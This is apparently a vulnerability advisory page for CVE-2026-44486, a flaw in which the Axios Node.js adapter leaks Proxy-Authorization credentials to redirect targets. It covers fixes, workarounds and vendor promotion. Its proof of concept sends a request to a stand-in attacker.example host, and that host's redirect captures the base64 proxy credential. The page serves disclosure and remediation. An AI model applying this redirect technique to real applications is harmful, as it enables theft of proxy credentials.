Summary
Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target.
This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected.
Affected Functionality
Affected functionality is limited to the Node.js HTTP adapter in lib/adapters/http.js.
Relevant inputs and settings include:
HTTP_PROXY,HTTPS_PROXY, andNO_PROXY.- Authenticated proxy URLs such as
http://user:[email protected]:8080. - Automatic redirect following through
follow-redirects. - Axios proxy handling in
setProxy(). - Redirect proxy handling through
beforeRedirects.proxy.
Technical Details
In affected v1 releases, setProxy() adds Proxy-Authorization when a proxy with credentials is selected, but redirect handling calls setProxy() again without first clearing any existing proxy authorization header.
If the redirected URL resolves to no proxy, setProxy() does not add a new proxy configuration and also does not remove the old header. The redirected request can therefore carry the stale Proxy-Authorization header to the final origin.
The v1 fix in afca61a adds an isRedirect path that deletes any case variant of Proxy-Authorization before proxy settings are re-applied on redirect. The v0 backport in 2af6116 fixed the 0.x line for 0.32.0.
Proof of Concept of Attack
process.env.HTTP_PROXY = 'http://user:[email protected]:8080';
delete process.env.HTTPS_PROXY;
await axios.get('http://attacker.example/start');
Attacker-controlled HTTP endpoint:
HTTP/1.1 302 Found
Location: https://attacker.example/final
Expected result on affected versions:
https://attacker.example/final receives:
Proxy-Authorization: Basic dXNlcjpwYXNz
Expected result on fixed versions:
https://attacker.example/final receives no Proxy-Authorization header
Workarounds
Set maxRedirects: 0 and handle redirects manually.
Avoid using authenticated proxy environment variables for requests to untrusted HTTP origins unless redirect behaviour is controlled.
Ensure proxy environment variables are configured consistently across protocols so redirects do not unexpectedly change from proxied to direct connections.
Original SourceAxios' Node.js HTTP adapter can leak proxy credentials to a redirect target origin. When an initial request is sent through an authenticated HTTP proxy, Axios adds a Proxy-Authorization header. On redirect, Axios re-evaluates proxy settings, but if the redirected request no longer uses a proxy, the stale Proxy-Authorization header is not cleared. As a result, the redirect target can receive the proxy credential directly.
This issue affects the Node.js HTTP adapter and can be reproduced when the initial request uses HTTP_PROXY with authentication, redirects are enabled, and the redirected request is resolved to no proxy, such as when HTTPS_PROXY is unset or the redirect target is excluded by NO_PROXY.
Details
In the current implementation:
setProxy()addsProxy-Authorizationwhen a proxy with credentials is in use.- On redirects, Axios re-invokes
setProxy()for the redirected request. - If the redirected URL re-evaluates to "no proxy",
setProxy()does not clear the previously addedProxy-Authorizationheader. - The redirected request therefore reuses the stale header and sends it to the final origin.
Relevant code locations:
lib/adapters/http.jssetProxy()addsProxy-Authorization- redirect handling re-applies proxy logic through
beforeRedirects.proxy - no cleanup is performed when the recomputed redirect request no longer uses a proxy
PoC
- The victim sends
GET http://<attacker-site>/start - The request goes through a local authenticated
corp proxy - The attacker-controlled HTTP endpoint returns
302 Location: https://<attacker-site>/final - The redirected HTTPS request no longer uses a proxy
- The attacker-controlled HTTPS endpoint receives the stale
Proxy-Authorizationheader
Observed output:
[corp-proxy] Proxy-Authorization received: Basic dXNlcjpwYXNz
[attacker-http] GET /start
[attacker-https] GET /final
[attacker-https] Proxy-Authorization received: Basic dXNlcjpwYXNz
Leak reproduced: Proxy-Authorization was sent to the attacker HTTPS origin.
This demonstrates that the proxy credential is exposed to the redirect target origin.
Impact
Exposes authenticated proxy credentials to an attacker-controlled origin.
Impact
An attacker who controls a server that the victim application requests can redirect the request so that the attacker-controlled redirect target receives the victim’s proxy credentials.
The most relevant case is a Node.js application using an authenticated HTTP_PROXY for an initial http:// request, with redirects enabled, where the redirect target resolves to no proxy, such as an https:// URL when HTTPS_PROXY is unset.
This does not affect browser, XHR, or fetch adapter behaviour. It also does not affect requests with maxRedirects: 0.
CVE-2026-44486 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.16.0, 0.32.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
axios to 1.16.0 or later; axios to 0.32.0 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-44486? CVE-2026-44486 is a high-severity security vulnerability in axios (npm), affecting versions >= 1.0.0, < 1.16.0. It is fixed in 1.16.0, 0.32.0.
- How severe is CVE-2026-44486? CVE-2026-44486 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of axios are affected by CVE-2026-44486? axios (npm) versions >= 1.0.0, < 1.16.0 is affected.
- Is there a fix for CVE-2026-44486? Yes. CVE-2026-44486 is fixed in 1.16.0, 0.32.0. Upgrade to this version or later.
- Is CVE-2026-44486 exploitable, and should I be worried? Whether CVE-2026-44486 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-44486 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-44486?
- Upgrade
axiosto 1.16.0 or later - Upgrade
axiosto 0.32.0 or later
- Upgrade